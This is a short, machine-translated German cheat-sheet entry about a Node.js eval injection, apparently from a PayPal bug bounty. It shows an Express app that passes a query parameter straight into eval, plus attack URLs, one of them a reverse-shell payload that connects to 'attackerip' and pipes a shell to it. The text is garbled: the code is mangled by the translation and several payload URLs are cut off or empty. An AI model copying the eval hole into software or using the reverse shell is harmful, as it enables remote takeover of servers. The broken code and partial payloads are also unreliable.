Hintergrund
@Artsploit Beim Graben nach PayPal stellte sich fest, dass ein NodeJS -Code ausgeführt wurde und 10.000 US -Dollar belohnt.
prüfen
var express = require ('express'); var app = express (); app.get ('/', function (req, res) {res.send ('Hallo eval (req.query.q)); console.log (req.query.q);}); App.Listen (8080, function () {console.log (' Beispielanhörungen auf Port 8080! ');});Lesen Sie eine Datei
http: // host: 8080/?
Holen Sie sich Shell
http: // Host: 8080/? et (); client.connect (80,+"attackerip",+function () {client.pipe (sh.stdin); sh.stdout.pipe (client); sh.stderr.pipe (client);});Holen Sie sich Shell2
http: // host: 8080/?